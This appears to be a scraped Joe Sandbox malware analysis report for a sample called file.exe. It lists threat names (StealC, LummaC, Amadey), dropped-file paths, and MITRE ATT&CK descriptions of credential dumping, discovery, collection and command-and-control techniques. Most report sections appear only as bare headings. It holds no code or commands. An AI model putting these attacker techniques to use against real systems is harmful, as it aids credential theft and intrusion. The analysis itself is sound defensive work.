Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8b82d73f70.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe

C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre